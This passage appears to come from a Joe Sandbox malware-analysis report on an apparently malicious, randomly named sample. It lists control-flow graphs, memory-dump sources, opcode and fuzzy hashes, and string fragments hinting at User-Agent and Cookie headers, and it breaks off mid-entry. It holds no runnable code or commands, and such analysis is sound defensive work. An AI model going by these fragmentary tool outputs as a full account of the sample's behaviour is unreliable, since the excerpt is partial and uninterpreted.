                                                                                                                                                                          control_flow_graph 110 1164674-116468d call 1163a1c 113 116468f-1164698 call 1163a6e 110->113 114 116469d-11646cd 110->114 113->114 117 11647e7-11647ec 114->117 118 11646d3-11646f5 114->118 118->117 120 11646fb-1164720 118->120 122 1164722-1164737 120->122 123 1164738-116475a 120->123 122->123 125 11647bf-11647c9 123->125 126 116475c-116477e 123->126 127 11647e0-11647e5 125->127 128 11647cb-11647dd call 1163673 125->128 126->125 132 1164780-11647a2 126->132 127->117 128->127 132->125 134 11647a4-11647bc 132->134 134->125
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: f8767cc80695f5b720c7adde5b32d973e735ff1c2862213ccf25447673b78a86
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D4161B6500608BFEF129F65CC44BEEBFBAFF80704F154069EA44AA254D7359650CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01164675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 135 1164675-1164680 136 116468b-116468d 135->136 137 1164686 call 1163a1c 135->137 138 116468f-1164698 call 1163a6e 136->138 139 116469d-11646cd 136->139 137->136 138->139 142 11647e7-11647ec 139->142 143 11646d3-11646f5 139->143 143->142 145 11646fb-1164720 143->145 147 1164722-1164737 145->147 148 1164738-116475a 145->148 147->148 150 11647bf-11647c9 148->150 151 116475c-116477e 148->151 152 11647e0-11647e5 150->152 153 11647cb-11647dd call 1163673 150->153 151->150 157 1164780-11647a2 151->157 152->142 153->152 157->150 159 11647a4-11647bc 157->159 159->150
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: 3e0deb0b5cdcc50c56aa97a06d9b689e6a5e566687e8a34d7fa1b46ac4335fc7
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 464161B6500608BFEF125F69CC48BDEBFBEFF80704F154069EA44AA254D7359650CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 01FF093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 1ff093e-1ff095f call 1ff0cc4 call 1ff14bc call 1ff3cc0 8 1ff0967-1ff0989 0->8 10 1ff098f-1ff09d2 call 1ff09d9 8->10 11 1ff0af1-1ff0af2 8->11 15 1ff0a3d-1ff0a76 10->15 16 1ff09d4-1ff09d5 10->16 17 1ff0a7e-1ff0a80 15->17 18 1ff0a3c 16->18 19 1ff09d7-1ff09e8 call 1ff3653 16->19 20 1ff0aec call 1ff0af3 17->20 21 1ff0a82-1ff0aae 17->21 18->15 19->20 30 1ff09ee-1ff0a10 19->30 20->11 21->20 27 1ff0ab0-1ff0abc 21->27 31 1ff0ac1-1ff0ae5 27->31 30->20 34 1ff0a16-1ff0a3b 30->34 31->11 37 1ff0ae7-1ff0aea 31->37 34->20 38 1ff0a41-1ff0a76 34->38 37->20 37->31 38->17
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 9f787b4a114e438c773e5ce175d4dfee72dae3f8a7ffc12038e15b4265060d00
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: 2151C2315442549FEB23AF20CC84B993BB8AF04740F040199FB45FE0E6DBB09594CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01FF14BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 39 1ff14bc-1ff1590 call 1ff14de call 1ff0c9c call 1ff1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction ID: bfe9d7f7eabf516cf5551531c1b906e8d1652d8a65ab349f18de1351930c51d2
                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C211D724086149EDB03AF60C9C8DA777ECEF40604F45096E9E89EF059FEB19154CEE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01FF1345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 58 1ff1345-1ff1352 59 1ff13eb-1ff13ec 58->59 60 1ff1358-1ff135e 58->60 60->59 61 1ff1364-1ff137a 60->61 61->59 63 1ff137c-1ff138f 61->63 65 1ff1391-1ff1398 63->65 66 1ff139b-1ff13ab call 1ff0e7c 65->66 69 1ff13ad-1ff13e2 66->69 69->59
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 9d872465cbf70f97b32a6c3bd469c70dafc5238e27be7853a9c15bcc31a4da9f
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: 62219031908216AFEB119F78C844B5DBFB6EF04700F054219FE55BB5A4DB70E810CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01FF14DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 70 1ff14de-1ff1590 call 1ff3653 call 1ff0c9c call 1ff1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction ID: 3b238f65e0d816864b808b707de84d9110065cce9cd42991d4942a38500817d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction Fuzzy Hash: B911BC72404615DEEF03AF60C9C8CAA73ECEE40604B45096E9E85EF459FEB19164CEE5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01FF3F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 88 1ff3f0d-1ff3f29 call 1ff3653 call 1ff379f 93 1ff3f3b-1ff3f66 call 1ff3f78 * 3 88->93 94 1ff3f2b-1ff3f39 call 1ff401b 88->94 107 1ff3f71 93->107 101 1ff3f76-1ff3f77 94->101 107->101 108 1ff3f71 call 1ff3f78 107->108 108->101
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                          • Instruction ID: 0b987fa3a4d5acf9e0e638d1da2115ed4cd13df4763786a0928d299e6ad6f779
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                          • Instruction Fuzzy Hash: 39F08274598241A6FF403F708C496093AB47F60705F040098ABC9BD0F4CEB15551CE70
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 01FF4675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 134 1ff4675-1ff468d call 1ff3a1c 137 1ff468f-1ff4698 call 1ff3a6e 134->137 138 1ff469d-1ff46cd 134->138 137->138 141 1ff47e7-1ff47ec 138->141 142 1ff46d3-1ff46f5 138->142 142->141 144 1ff46fb-1ff4720 142->144 146 1ff4738-1ff475a 144->146 147 1ff4722-1ff4737 144->147 149 1ff47bf-1ff47c9 146->149 150 1ff475c-1ff477e 146->150 147->146 151 1ff47cb-1ff47dd call 1ff3673 149->151 152 1ff47e0-1ff47e5 149->152 150->149 156 1ff4780-1ff47a2 150->156 151->152 152->141 156->149 158 1ff47a4-1ff47bc 156->158 158->149
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: e571af989efc4ff1608e4dafaaca01c321a614f031cce3ebd8c68e7d8232835a
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: CA4161B6900208FFEF125F69CC48BDEBFB9FF80704F154069EA44AA264D7759644CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01FF4674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 109 1ff4674-1ff4680 110 1ff468b-1ff468d 109->110 111 1ff4686 call 1ff3a1c 109->111 112 1ff468f-1ff4698 call 1ff3a6e 110->112 113 1ff469d-1ff46cd 110->113 111->110 112->113 116 1ff47e7-1ff47ec 113->116 117 1ff46d3-1ff46f5 113->117 117->116 119 1ff46fb-1ff4720 117->119 121 1ff4738-1ff475a 119->121 122 1ff4722-1ff4737 119->122 124 1ff47bf-1ff47c9 121->124 125 1ff475c-1ff477e 121->125 122->121 126 1ff47cb-1ff47dd call 1ff3673 124->126 127 1ff47e0-1ff47e5 124->127 125->124 131 1ff4780-1ff47a2 125->131 126->127 127->116 131->124 133 1ff47a4-1ff47bc 131->133 133->124
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: 31598023da68bc81c7b61b0384cf365341876fa5fa51c7c2d0223e9a88a7ff90
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: FC4161B6900208FFEF129F65CC44BEEBFBAFF80704F154069EA44AA264D7759640CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 0263093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 263093e-263095f call 2630cc4 call 26314bc call 2633cc0 8 2630967-2630989 0->8 10 2630af1-2630af2 8->10 11 263098f-26309d2 call 26309d9 8->11 15 26309d4-26309d5 11->15 16 2630a3d-2630a80 11->16 17 26309d7-26309e8 call 2633653 15->17 18 2630a3c 15->18 22 2630a82-2630aae 16->22 23 2630aec call 2630af3 16->23 17->23 29 26309ee-2630a10 17->29 18->16 22->23 27 2630ab0-2630abc 22->27 23->10 31 2630ac1-2630ae5 27->31 29->23 33 2630a16-2630a3b 29->33 31->10 37 2630ae7-2630aea 31->37 33->18 33->23 37->23 37->31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: d97159d6e993760e49e9dc721a4804c8ede456f07546ed64e54629e9f12f2516
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: C7517E316442549FEB239F20CC85B9A77BCAF04744F0401D9EA49FE1D6DBB09694CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 026314BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 38 26314bc-2631590 call 26314de call 2630c9c call 2631345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction ID: 62c407d0e037ba372b2ca73e4e6c54abfbe99613442f0c32260c83b641de3f32
                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction Fuzzy Hash: 57210C724046149EEF03AF60C9C8CA673ECEF41704F4509AA9D89EF049FE709554CEEA
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02631345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 57 2631345-2631352 58 26313eb-26313ec 57->58 59 2631358-263135e 57->59 59->58 60 2631364-263137a 59->60 60->58 62 263137c-263138f 60->62 64 2631391-2631398 62->64 65 263139b-26313ab call 2630e7c 64->65 68 26313ad-26313e2 65->68 68->58
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: c7d84caa2f3dbb54a079b68f783be2200231a9e5b47ff059d1dcf0838b11a3e7
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: 6221D231A04216AFEF12DF78C844B5DBBB5AF05700F054255FD59BB694DB30E900CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 026314DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 69 26314de-2631590 call 2633653 call 2630c9c call 2631345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction ID: 4b0e57a3d443d27c14945c7e50721c76b54bccdebdb575d6f22000506c12ec4a
                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A1186724046149EEF03AF60C5C8CAA73ECEF41708B4509AE9D89EF449FE719154CEE9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02633F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 87 2633f0d-2633f29 call 2633653 call 263379f 92 2633f3b-2633f66 call 2633f78 * 3 87->92 93 2633f2b-2633f39 call 263401b 87->93 106 2633f71 92->106 101 2633f76-2633f77 93->101 106->101 107 2633f71 call 2633f78 106->107 107->101
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction ID: 0834c268b7b74bcd1d5820c5794c8b3633a6835d8a09433a703c84c1926caaf5
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction Fuzzy Hash: F4F01C70588280AAFF423FB08C4965936B9AF40786F4405DDAA89ED2D5DE7085608EF9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 02634675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 133 2634675-263468d call 2633a1c 136 263468f-2634698 call 2633a6e 133->136 137 263469d-26346cd 133->137 136->137 140 26346d3-26346f5 137->140 141 26347e7-26347ec 137->141 140->141 143 26346fb-2634720 140->143 145 2634722-2634737 143->145 146 2634738-263475a 143->146 145->146 148 26347bf-26347c9 146->148 149 263475c-263477e 146->149 150 26347e0-26347e5 148->150 151 26347cb-26347dd call 2633673 148->151 149->148 154 2634780-26347a2 149->154 150->141 151->150 154->148 157 26347a4-26347bc 154->157 157->148
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: 9e2cab7832aa77dfb5d46ffda19535afe7fece06bcb827bddafcb1d7fc677167
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F4163B6500208BFEF125FA5CC48BDEBFBAEF84704F154069EA44AA254DB34D650CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02634674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 108 2634674-2634680 109 263468b-263468d 108->109 110 2634686 call 2633a1c 108->110 111 263468f-2634698 call 2633a6e 109->111 112 263469d-26346cd 109->112 110->109 111->112 115 26346d3-26346f5 112->115 116 26347e7-26347ec 112->116 115->116 118 26346fb-2634720 115->118 120 2634722-2634737 118->120 121 2634738-263475a 118->121 120->121 123 26347bf-26347c9 121->123 124 263475c-263477e 121->124 125 26347e0-26347e5 123->125 126 26347cb-26347dd call 2633673 123->126 124->123 129 2634780-26347a2 124->129 125->116 126->125 129->123 132 26347a4-26347bc 129->132 132->123
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002B.00000002.2998706613.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_43_2_2630000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: dbde3d8a23a15ebec385b8f064784cf0b27d28e7c61d160758b43b25961ca33f
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E4153B6500208BFEF129FA5CC84BDEBBBAEF84704F154059EA44AA254DB349650CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 0081093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
